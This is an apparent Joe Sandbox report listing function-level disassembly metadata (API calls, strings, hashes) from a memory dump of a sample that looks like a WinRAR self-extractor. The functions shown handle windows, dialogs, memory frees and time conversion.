Instruction ID: 342a076b9ecd66be5b260bb3113286d9c4d784f9ec4ee3630738b78c89c73ed9
Opcode Fuzzy Hash: c793273b29eee08dd7adb52efc6b23c4a81a65195a7e0c74aa44b269bf70755f
Instruction Fuzzy Hash: 96219576A201718FCB48CF2DDC9087A7755A78A321746C22BEA468B2D1C63DE965C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0071DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0071DABE

Part of subcall function 0071400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0071401D

Part of subcall function 00721596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00750EE8,00000200,0071D202,00000000,?,00000050,00750EE8), ref: 007215B3

_strlen.LIBCMT ref: 0071DADF
SetDlgItemTextW.USER32(?,0074E154,?), ref: 0071DB3F
GetWindowRect.USER32(?,?), ref: 0071DB79
GetClientRect.USER32(?,?), ref: 0071DB85
GetWindowLongW.USER32(?,000000F0), ref: 0071DC25
GetWindowRect.USER32(?,?), ref: 0071DC52
SetWindowTextW.USER32(?,?), ref: 0071DC95
GetSystemMetrics.USER32(00000008), ref: 0071DC9D
GetWindow.USER32(?,00000005), ref: 0071DCA8
GetWindowRect.USER32(00000000,?), ref: 0071DCD5
GetWindow.USER32(00000000,00000002), ref: 0071DD47

Strings

$%s:, xrefs: 0071DAB2
Tt, xrefs: 0071DAFA
d, xrefs: 0071DBA5
CAPTION, xrefs: 0071DC77

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$Tt$d
API String ID: 2407758923-2502141594
Opcode ID: 1c64e4f53f08dc95f35bfb052429363daf98aafa2b1e98139d9b7a984ed7da75
Instruction ID: d2d5346159612b34aa203fe7a36e05a455e64f7ba53450e0de3fbff30eeebd5a
Opcode Fuzzy Hash: 1c64e4f53f08dc95f35bfb052429363daf98aafa2b1e98139d9b7a984ed7da75
Instruction Fuzzy Hash: 2B81C371208305AFD720DF68CC88AABBBE9FB88704F04491DF69993291D678ED45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0073C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0073C277

Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BE2F
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BE41
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BE53
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BE65
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BE77
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BE89
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BE9B
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BEAD
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BEBF
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BED1
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BEE3
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BEF5
Part of subcall function 0073BE12: _free.LIBCMT ref: 0073BF07

_free.LIBCMT ref: 0073C26C

Part of subcall function 007384DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?), ref: 007384F4
Part of subcall function 007384DE: GetLastError.KERNEL32(?,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?,?), ref: 00738506

_free.LIBCMT ref: 0073C28E
_free.LIBCMT ref: 0073C2A3
_free.LIBCMT ref: 0073C2AE
_free.LIBCMT ref: 0073C2D0
_free.LIBCMT ref: 0073C2E3
_free.LIBCMT ref: 0073C2F1
_free.LIBCMT ref: 0073C2FC
_free.LIBCMT ref: 0073C334
_free.LIBCMT ref: 0073C33B
_free.LIBCMT ref: 0073C358
_free.LIBCMT ref: 0073C370

Strings

Pt, xrefs: 0073C249

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: Pt
API String ID: 161543041-3089937733
Opcode ID: cb4d255cfeb2c8bb036d3d2cbdc9d59d37760850d00422cc33d81e9b706ee7a9
Instruction ID: d62b3506362def5df9131864a9336609673e3f9b3ead958303d9c587068b34cc
Opcode Fuzzy Hash: cb4d255cfeb2c8bb036d3d2cbdc9d59d37760850d00422cc33d81e9b706ee7a9
Instruction Fuzzy Hash: BB314732600305DFFB62AF78D949B5B73E9BB00310F148429F449EB953DE39AC448B62

Uniqueness

Uniqueness Score: -1.00%

Function 0072CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0072CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 0072CD7D

Part of subcall function 007217AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0071BB05,00000000,.exe,?,?,00000800,?,?,007285DF,?), ref: 007217C2

GetWindowLongW.USER32(00000000,000000F0), ref: 0072CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0072CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 0072CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0072CDED
DeleteObject.GDI32(00000000), ref: 0072CDF4
GetWindow.USER32(00000000,00000002), ref: 0072CDFD

Strings

STATIC, xrefs: 0072CD83

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 22249ea1c5e0e8cda94e64c0d2d346945c6f0175d4c6364da674d14e306c2504
Instruction ID: 1714fcadfbc7c5c7cfa6973643297367030a14ac6c000ac6d384bbc4b35b040f
Opcode Fuzzy Hash: 22249ea1c5e0e8cda94e64c0d2d346945c6f0175d4c6364da674d14e306c2504
Instruction Fuzzy Hash: 7911E732644334BBE7226B60AC4DF9F365CFF65781F018424FB56A10A3CA6C8D46D6B8

Uniqueness

Uniqueness Score: -1.00%

Function 00738EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00738EC5

Part of subcall function 007384DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?), ref: 007384F4
Part of subcall function 007384DE: GetLastError.KERNEL32(?,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?,?), ref: 00738506

_free.LIBCMT ref: 00738ED1
_free.LIBCMT ref: 00738EDC
_free.LIBCMT ref: 00738EE7
_free.LIBCMT ref: 00738EF2
_free.LIBCMT ref: 00738EFD
_free.LIBCMT ref: 00738F08
_free.LIBCMT ref: 00738F13
_free.LIBCMT ref: 00738F1E
_free.LIBCMT ref: 00738F2C

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2eda36fa7fd9ff25d52ec7bd3f05a4a2e0b34b6e02ee9b6bbdb59b01734f08c1
Instruction ID: 67345b9dc366177232995016a0b4609fd4dd9485e5435e4ddc38a2f6ede465a8
Opcode Fuzzy Hash: 2eda36fa7fd9ff25d52ec7bd3f05a4a2e0b34b6e02ee9b6bbdb59b01734f08c1
Instruction Fuzzy Hash: E011D47611024DEFDF91EF54C846DDA3BA5FF08350F0140A0FA088FA23DA35DA559B82

Uniqueness

Uniqueness Score: -1.00%

Function 00712162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

;%u, xrefs: 00712497
xc%u, xrefs: 007126D7
x%u, xrefs: 0071267A

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: e394514229d5da7c7fb5729328c6b13a3cf7fd42f474c9185108fcc1962d2388
Instruction ID: 5212f35d71b1172cc0cb1fb78afc8c6623a71fb723fdb10ef17f0a0a1969fb52
Opcode Fuzzy Hash: e394514229d5da7c7fb5729328c6b13a3cf7fd42f474c9185108fcc1962d2388
Instruction Fuzzy Hash: 73F106716042409BDB15EF7C8899BFE77966F90300F080579FD859B2C3DA6C98E6C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0072ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0071130B: GetDlgItem.USER32(00000000,00003021), ref: 0071134F
Part of subcall function 0071130B: SetWindowTextW.USER32(00000000,007435B4), ref: 00711365

EndDialog.USER32(?,00000001), ref: 0072AD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 0072AD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0072AD60
SetWindowTextW.USER32(?,?), ref: 0072AD71
GetDlgItem.USER32(?,00000065), ref: 0072AD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0072AD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0072ADA4

Strings

LICENSEDLG, xrefs: 0072ACE4

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 40878c173c9012558aac58ce62f58459dcfdb4bbb6fc1626769c010e5096ae32
Instruction ID: 5cbf61e2b36c6a8d946102f7aafb1255543354ea3b99df6dd1e56a4584b08c2e
Opcode Fuzzy Hash: 40878c173c9012558aac58ce62f58459dcfdb4bbb6fc1626769c010e5096ae32
Instruction Fuzzy Hash: 2521E731340214BBD2215F35FD4DE7B3B6CFB46B86F018414F609A24A6DBAD5D42D63A

Uniqueness

Uniqueness Score: -1.00%

Function 00719443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00719448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0071946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0071948A

Part of subcall function 007217AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0071BB05,00000000,.exe,?,?,00000800,?,?,007285DF,?), ref: 007217C2

_swprintf.LIBCMT ref: 00719526

Part of subcall function 0071400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0071401D

MoveFileW.KERNEL32(?,?), ref: 00719595
MoveFileW.KERNEL32(?,?), ref: 007195D5

Strings

rtmp%d, xrefs: 0071950F

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 89c578f70e4005a705ea0336eb711e81fcfa2a391d8c3e256d442420317be48f
Instruction ID: 5dcbdc0c7ca32b5a55b2edfadb03f09330f7ff88eb1be2f7cf17fc1af7c8b4d4
Opcode Fuzzy Hash: 89c578f70e4005a705ea0336eb711e81fcfa2a391d8c3e256d442420317be48f
Instruction Fuzzy Hash: 3B414375900158B6CF20EB688C99ADE737CAF55780F0444E5B649E3092EB7C9BCACB74

Uniqueness

Uniqueness Score: -1.00%

Function 00738FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00750EE8,00733E14,00750EE8,?,?,00733713,00000050,?,00750EE8,00000200), ref: 00738FA9
_free.LIBCMT ref: 00738FDC
_free.LIBCMT ref: 00739004
SetLastError.KERNEL32(00000000,?,00750EE8,00000200), ref: 00739011
SetLastError.KERNEL32(00000000,?,00750EE8,00000200), ref: 0073901D
_abort.LIBCMT ref: 00739023

Strings

Xt, xrefs: 00738FF7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: Xt
API String ID: 3160817290-2287795844
Opcode ID: 6b7e555c04b078852d220645a078c1b2096a0b1819dc7a604cd75fad40866d76
Instruction ID: f8517083b7a9d70a0edf2d71e44755addf74b5a4fd3d5a6ee8ed476b118ff03a
Opcode Fuzzy Hash: 6b7e555c04b078852d220645a078c1b2096a0b1819dc7a604cd75fad40866d76
Instruction Fuzzy Hash: 0BF0CD3A505702EAF79133247C0FB2B19665BD2770F354115F519D61A3EF7CC9015117

Uniqueness

Uniqueness Score: -1.00%

Function 00720A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00720A9D

Part of subcall function 0071ACF5: GetVersionExW.KERNEL32(?), ref: 0071AD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00720AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00720AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00720AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00720AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 00720B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 00720B3D
__aullrem.LIBCMT ref: 00720BCB

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 457e868afe48f8dbc8b4342c3207bbed20bcc2d617a299e076f951a94c3480eb
Instruction ID: 71cc7b3cb37be25b2fc97cd017fb2210375bd8f45e881e83ca5c5283269a380a
Opcode Fuzzy Hash: 457e868afe48f8dbc8b4342c3207bbed20bcc2d617a299e076f951a94c3480eb
Instruction Fuzzy Hash: C24137B5408316EFC710DF64D88496BFBF8FB88714F104A2EF59692650E778E648CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0073EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0073F5A2,?,00000000,?,00000000,00000000), ref: 0073EE6F
__fassign.LIBCMT ref: 0073EEEA
__fassign.LIBCMT ref: 0073EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0073EF2B
WriteFile.KERNEL32(?,?,00000000,0073F5A2,00000000,?,?,?,?,?,?,?,?,?,0073F5A2,?), ref: 0073EF4A
WriteFile.KERNEL32(?,?,00000001,0073F5A2,00000000,?,?,?,?,?,?,?,?,?,0073F5A2,?), ref: 0073EF83

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: cf805aae4234f495d22b08c6127efcedbf5bc8319e8336fa16f6c1f1c8659e9f
Instruction ID: 12c4255ccfc881e429e69785781a9c6670e94ccb58f36c0d7f702ac698d39fa7
Opcode Fuzzy Hash: cf805aae4234f495d22b08c6127efcedbf5bc8319e8336fa16f6c1f1c8659e9f
Instruction Fuzzy Hash: EC51D5B1A00209DFEB10CFA8DC45AEEBBF9FF09310F24451AE555E7292E7749980CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0072C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 0072C54A
_swprintf.LIBCMT ref: 0072C57E

Part of subcall function 0071400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0071401D

SetDlgItemTextW.USER32(?,00000066,0075946A), ref: 0072C59E
_wcschr.LIBVCRUNTIME ref: 0072C5D1
EndDialog.USER32(?,00000001), ref: 0072C6B2

Strings

%s%s%u, xrefs: 0072C573

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: c4155c422bac67d2e24e63fe85b465b466daadf01a3a33e020cc289d685111fb
Instruction ID: 1b7c4d830f60a56e473b9e06354fe578f3698fccc430a884be0ec6a1581a4c94
Opcode Fuzzy Hash: c4155c422bac67d2e24e63fe85b465b466daadf01a3a33e020cc289d685111fb
Instruction Fuzzy Hash: 8341D5B1D00668EADB22DBA4EC45EDE77BCEF18301F1080A6E509D6061E7799BC4CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00728E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 00728F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00728F59

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00728EB2
utf-8"></head>, xrefs: 00728EBD
</html>, xrefs: 00728F0A
<html>, xrefs: 00728EA7, 00728EE0

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: abd10875449321dbb4d018a1568f39272ead521377a830f39d7a649d1d7f6a06
Instruction ID: c587fc7760416f3a1d35610043224661279bda3263bafa54157824dcba5a4ae2
Opcode Fuzzy Hash: abd10875449321dbb4d018a1568f39272ead521377a830f39d7a649d1d7f6a06
Instruction Fuzzy Hash: 24318D72509325BBE724BB34AC0AF6F7798EF91720F144019F811961C2EF7D9A09C3A6

Uniqueness

Uniqueness Score: -1.00%

Function 00729635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 0072964E
GetWindowRect.USER32(?,00000000), ref: 00729693
ShowWindow.USER32(?,00000005,00000000), ref: 0072972A
SetWindowTextW.USER32(?,00000000), ref: 00729732
ShowWindow.USER32(00000000,00000005), ref: 00729748

Strings

RarHtmlClassName, xrefs: 007296F4

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: d2370cac07c691a38114782070c823c419a95c9ed3a232dacacbdc1eca2ff51e
Instruction ID: 81df03a48803b3be1a8890f3124cc11a2e7dcd0fd5d5225ed686740dcc3bbcf4
Opcode Fuzzy Hash: d2370cac07c691a38114782070c823c419a95c9ed3a232dacacbdc1eca2ff51e
Instruction Fuzzy Hash: 3131D231104214EFDB219F64EC4CB6B7BA8FF48341F088559FE599A263CB38D945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0073BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0073BF79: _free.LIBCMT ref: 0073BFA2

_free.LIBCMT ref: 0073C003

Part of subcall function 007384DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0073BFA7,?,00000000,?,00000000,?,0073BFCE,?,00000007,?,?,0073C3CB,?), ref: 007384F4
